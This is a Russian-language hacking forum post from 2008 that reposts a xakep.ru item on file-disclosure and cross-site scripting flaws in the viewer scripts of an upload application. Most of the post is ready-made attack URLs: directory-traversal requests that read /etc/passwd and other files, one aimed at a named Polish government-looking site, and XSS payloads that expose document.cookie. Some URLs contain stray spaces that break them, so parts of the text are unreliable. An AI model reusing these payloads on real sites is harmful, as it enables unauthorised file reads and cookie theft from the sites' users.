Показать сообщение отдельно

  #3  
Старый 09.12.2008, 21:35
sadfeel
Познающий
Регистрация: 05.11.2008
Сообщений: 79
Провел на форуме:
185461

Репутация: 12
По умолчанию

Добавления:


источник http://www.xakep.ru/post/35874


Уязвимость позволяет удаленному злоумышленнику получить содержимое произвольных файлов на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных в параметре «current_dir» сценариями html.php и htm.php. Атакующий может получить содержимое произвольных файлов на целевой системе.

Примеры:

http://site.gov.pl/upload/viewers/html.php?current_dir=..&filename=[file]
http://site.gov.pl/upload/viewers/htm.php?current_dir=..&filename=[file]
http://site.gov.pl/upload/viewers/htm.php?current_dir=С:\&filename=program.exe


Уязвимость позволяет удаленному пользователю произвести XSS нападение. Удаленный пользователь с привилегиями на загрузку файлов может загрузить произвольный HTML сценарий и выполнить его в контексте безопасности уязвимого сайта.

Пример:

<IMG SRC="_javascript:alert('hba from all iranian hacker');">



Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и просмотреть произвольные файлы на системе.

1. Уязвимость существует из-за того, что программное обеспечение не обрабатывает должным образом входные данные в параметрах 'currentdir' и 'current_dir'. Удаленный пользователь может с помощью специально сформированного URL, содержащего символы обхода каталога, просмотреть произвольные файлы на системе с привилегиями Web сервера.

Пример:

http://[target]/[path]/viewers/txt.php?currentdir= ../../../../../../../etc/passwd%00
http://[target]/[path]/viewers/txt.php?c urrentdir= ../../../../../../../etc&filename=passwd
http://[target]/[path]/viewers/htm.php?current_dir= ../../../../../../../etc/passwd%00
http://[target]/[path]/viewers/ htm.php?current_dir= ../../../../../../../etc&filename=passwd
http://[target]/[path]/viewers/html.php?current_dir= ../../../../../../../etc/passwd%00
http://[target]/[pat h]/viewers/html.php?current_dir= ../../../../../../../etc&filename=passwd
http://[target]/phpatm/viewers/zip.php?current_dir= ../../../../../../../[filename].zip%00
http://[target]/phpatm/viewers/zip.php?current_dir= ../../../.. /../../..&filename=[filename].zip

2. Межсайтовый скриптинг возможен из-за отсутствия проверки входных данных в некоторых переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://[target]/[path]/viewers/txt.php?font=% 22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path]/viewers/txt.php?normalfontcolor=%22%3E%3Cscript%3Ealert(do cument.cookie)%3C/script%3E
http:/ /[target]/[path]/viewers/txt.php?mess[31]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Ответить с цитированием